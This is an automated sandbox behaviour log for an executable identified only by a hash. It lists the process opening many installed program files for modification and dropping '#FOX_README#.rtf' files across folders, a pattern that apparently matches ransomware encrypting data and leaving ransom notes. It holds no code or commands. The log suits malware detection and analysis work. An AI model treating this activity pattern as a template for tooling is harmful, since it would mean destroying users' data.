f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Monrovia f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Mozilla Firefox\updater.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\XmlFile.zip f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.nl_zh_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.equinox.nl_zh_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\crashreporter-override.ini f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\plugin.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\el.pak f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Yellowknife f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-6 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Krasnoyarsk f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Montevideo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbytools.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\bn\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\etc\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes.nl_ja_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\en_GB\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jre7\lib\zi\America\Kentucky\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\management\management.properties f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-heapdump.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Eirunepe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.forms.nl_zh_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Tirane f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvm_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-actions.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\mc.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-options-keymap_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Jakarta f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Kuala_Lumpur f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.compatibility.state.nl_ja_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\policytool.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\jawt.lib f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\content-types.properties f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-jvmstat.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-util-enumerations_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\about.html f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\pt_BR\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-lib-uihandler.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\abcpy.ini f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.attach.ja_5.5.0.165303.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Singapore f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Luxembourg f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\main.css f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Mozilla Firefox\minidump-analyzer.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\org-openide-util.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Iqaluit f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.ui_5.5.0.165303.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\management\jmxremote.access f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-options.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale\core_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\VDK10.SYX f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Kwajalein f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jre7\lib\zi\Antarctica\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\ar.pak f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.engine_2.3.0.v20140506-1720.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\javacpl.cpl f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Nassau f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.repository.nl_ja_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.app_1.3.200.v20130910-1609.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.repository_1.2.100.v20131209-2144.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.w3c.dom.svg_1.1.0.v201011041433.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Kolkata f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861240811.profile.gz f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Riyadh87 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-explorer.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\et.pak f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-sampler.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\London f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\es-419.pak f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\YST9YDT f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\etc\visualvm.conf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\tl\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.equinox.nl_ja_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_pt_BR.properties f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help_3.6.0.v20130326-1254.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Bahia f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.emf.common_2.10.1.v20140901-1043.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Chatham f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\es.pak f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Updater.api f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.sat4j.core_2.3.5.v201308161310.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.swt.nl_ja_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Havana f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.jarprocessor.nl_zh_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-api-caching_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\psfont.properties.ja f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\vi\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-io-ui_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\ant-javafx.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Kentucky\Louisville f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\fil.pak f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\tnameserv.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\plugin.properties f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-lib-profiler-ui.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\SearchRemove.pdf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\ECLIPSE_.RSA f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\calendars.properties f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Bissau f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-application-views.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Baku f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\lt\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Cuiaba f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\as80.xsl f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\asl-v20.txt f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\MET f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\bin\policytool.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\jfr\profile.jfc f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.actionProvider.exsd f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\eclipse.inf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-options-api_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Chagos f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Nipigon f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Cayenne f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Mozilla Maintenance Service\logs\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.core_5.5.0.165303.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Tripoli f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Casablanca f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Rangoon f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-host.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.text.nl_zh_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.provider.filetransfer.httpclient4.ssl_1.0.0.v20140827-1444.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-favorites.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-masterfs_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\lua\http\requests\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-4 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-applemenu_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-templates.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Sakhalin f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.artifact.repository_1.1.300.v20131211-1531.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\PST8PDT f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\MEIPreload\manifest.json 